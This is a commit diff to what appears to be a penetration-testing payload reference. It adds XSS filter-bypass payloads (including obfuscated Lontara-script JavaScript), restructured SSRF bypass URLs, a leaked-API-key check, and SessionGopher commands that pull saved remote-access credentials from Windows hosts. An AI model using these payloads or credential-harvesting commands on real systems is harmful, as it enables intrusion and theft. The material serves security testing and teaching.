XSS without parenthesis, semi-colon + Lontara

Insecure Source Code Management/README.md

@@ -15,6 +15,7 @@
 - [BAZAAR - Source code management](#bazaar---source-code-management)
   - [Automatic way : rip-bzr](#automatic-way--rip-bzr)
   - [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
+- [Leaked API keys](#leaked-api-keys)
 
 ## GIT - Source code management
 
@@ -236,6 +237,16 @@ $ bzr revert
  N  static/   
 ```
 
+## Leaked API keys
+
+If you find any key , use the [keyhacks](https://github.com/streaak/keyhacks) from @streaak to verifiy them.
+
+Twilio example :
+
+```powershell
+curl -X GET 'https://api.twilio.com/2010-04-01/Accounts/ACCOUNT_SID/Keys.json' -u ACCOUNT_SID:AUTH_TOKEN
+```
+
 ## References
 
 - [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)

Methodology and Resources/Active Directory Attack.md

@@ -686,3 +686,4 @@ net group "Domain Admins" hacker2 /add /domain
 * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
 * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
 * [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
+* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)

Methodology and Resources/Windows - Privilege Escalation.md

@@ -320,6 +320,19 @@ Oneliner method to extract wifi passwords from all the access point.
 cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
 ```
 
+### Passwords stored in services
+
+Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)
+
+
+```powershell
+https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
+Import-Module path\to\SessionGopher.ps1;
+Invoke-SessionGopher -AllDomain -o
+Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
+```
+
+
 ## EoP - Processes Enumeration and Tasks
 
 What processes are running?

Server Side Request Forgery/README.md

@@ -7,6 +7,19 @@
 * [Tools](#tools)
 * [Payloads with localhost](#payloads-with-localhost)
 * [Bypassing filters](#bypassing-filters)
+  * [Bypass using HTTPS](#bypass-using-https)
+  * [Bypass localhost with [::]](#bypass-localhost-with----)
+  * [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection)
+  * [Bypass localhost with CIDR](#bypass-localhost-with-cidr)
+  * [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location)
+  * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6-ipv4-address-embedding)
+  * [Bypass using malformed urls](#bypass-using-malformed-urls)
+  * [Bypass using rare address](#bypass-using-rare-address)
+  * [Bypass using bash variables](#bypass-using-bash-variables)
+  * [Bypass using tricks combination](#bypass-using-tricks-combination)
+  * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
+  * [Bypass filter_var() php function](#bypass-filter-var-php-function)
+  * [Bypass against a weak parser](#bypass-against-a-weak-parser)
 * [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)
   * [file://](#file)
   * [http://](#http)
@@ -15,7 +28,7 @@
   * [tftp://](#tftp)
   * [ldap://](#ldap)
   * [gopher://](#gopher)
-* [SSRF to XSS](#ssrf-to-xss-by-d0rkerdevil--alyssaoherrera)
+* [SSRF to XSS](#ssrf-to-xss)
 * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
   * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
   * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)
@@ -75,14 +88,14 @@ Using this vulnerability users can upload images from any image URL = trigger an
 
 ## Bypassing filters
 
-Bypass using HTTPS
+### Bypass using HTTPS
 
 ```powershell
 https://127.0.0.1/
 https://localhost/
 ```
 
-Bypass localhost with [::]
+### Bypass localhost with [::]
 
 ```powershell
 http://[::]:80/
@@ -98,7 +111,7 @@ http://0000::1:22/ SSH
 http://0000::1:3128/ Squid
 ```
 
-Bypass localhost with a domain redirecting to locahost
+### Bypass localhost with a domain redirection
 
 ```powershell
 http://localtest.me
@@ -113,16 +126,17 @@ The service nip.io is awesome for that, it will convert any ip address as a dns.
 NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
 ```
 
-Bypass localhost with CIDR : 127.x.x.x
+### Bypass localhost with CIDR 
+
+It's a /8
 
 ```powershell
-it's a /8
 http://127.127.127.127
 http://127.0.1.3
 http://127.0.0.0
 ```
 
-Bypass using a decimal ip location
+### Bypass using a decimal IP location
 
 ```powershell
 http://0177.0.0.1/
@@ -131,20 +145,24 @@ http://3232235521/ = http://192.168.0.1
 http://3232235777/ = http://192.168.1.1
 ```
 
-Bypass using [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
+### Bypass using IPv6/IPv4 Address Embedding
+
+[IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
 
 ```powershell
 http://[0:0:0:0:0:ffff:127.0.0.1]
 ```
 
-Bypass using malformed urls
+### Bypass using malformed urls
 
 ```powershell
 localhost:+11211aaa
 localhost:00011211aaaa
 ```
 
-Bypass using rare address, you can short-hand IP addresses by dropping the zeros
+### Bypass using rare address
+
+You can short-hand IP addresses by dropping the zeros
 
 ```powershell
 http://0/
@@ -152,14 +170,16 @@ http://127.1
 http://127.0.1
 ```
 
-Bypass using bash variables (curl only)
+### Bypass using bash variables 
+
+(curl only)
 
 ```powershell
 curl -v "http://evil$google.com"
 $google = ""
 ```
 
-Bypass using tricks combination
+### Bypass using tricks combination
 
 ```powershell
 http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
@@ -168,7 +188,9 @@ requests + browsers : 2.2.2.2
 urllib : 3.3.3.3
 ```
 
-Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
+### Bypass using enclosed alphanumerics 
+
+[@EdOverflow](https://twitter.com/EdOverflow)
 
 ```powershell
 http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
@@ -177,13 +199,15 @@ List:
 ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
 ```
 
-Bypass filter_var() php function
+### Bypass filter_var() php function
 
 ```powershell
 0://evil.com:80;http://google.com:80/ 
 ```
 
-Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
+### Bypass against a weak parser
+
+by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
 
 ```powershell
 http://127.1.1.1:80\@127.2.2.2:80/
@@ -317,7 +341,9 @@ Content of evil.com/redirect.php:
 ?>
 ```
 
-## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
+## SSRF to XSS 
+
+by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
 
 ```bash
 http://brutelogic.com.br/poc.svg -> simple alert

XSS Injection/README.md

@@ -28,6 +28,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
   - [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event)
   - [Bypass dot filter](#bypass-dot-filter)
   - [Bypass parenthesis for string](#bypass-parenthesis-for-string)
+  - [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon)
   - [Bypass onxxxx= blacklist](#bypass-onxxxx---blacklist)
   - [Bypass space filter](#bypass-space-filter)
   - [Bypass email filter](#bypass-email-filter)
@@ -39,6 +40,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
   - [Bypass ";" using another character](#bypass-using------using-another-character)
   - [Bypass using HTML encoding](#bypass-using-html-encoding)
   - [Bypass using Katana](#bypass-using-katana)
+  - [Bypass using Lontara](#bypass-using-lontara)
   - [Bypass using ECMAScript6](#bypass-using-ecmascript6)
   - [Bypass using Octal encoding](#bypass-using-octal-encoding)
   - [Bypass using Unicode](#bypass-using-unicode)
@@ -525,6 +527,21 @@ alert`1`
 setTimeout`alert\u0028document.domain\u0029`;
 ```
 
+### Bypass parenthesis and semi colon
+
+```javascript
+// From @garethheyes
+<script>onerror=alert;throw 1337</script>
+<script>{onerror=alert}throw 1337</script>
+<script>throw onerror=alert,'some string',123,'haha'</script>
+
+// From @terjanq 
+<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
+
+// From @cgvwzq
+<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
+```
+
 ### Bypass onxxxx= blacklist
 
 ```javascript
@@ -704,6 +721,14 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library.
 javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
 ```
 
+### Bypass using Lontara
+
+```javscript
+ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()
+```
+
+More alphabets on http://aem1k.com/aurebesh.js/#
+
 ### Bypass using ECMAScript6
 
 ```html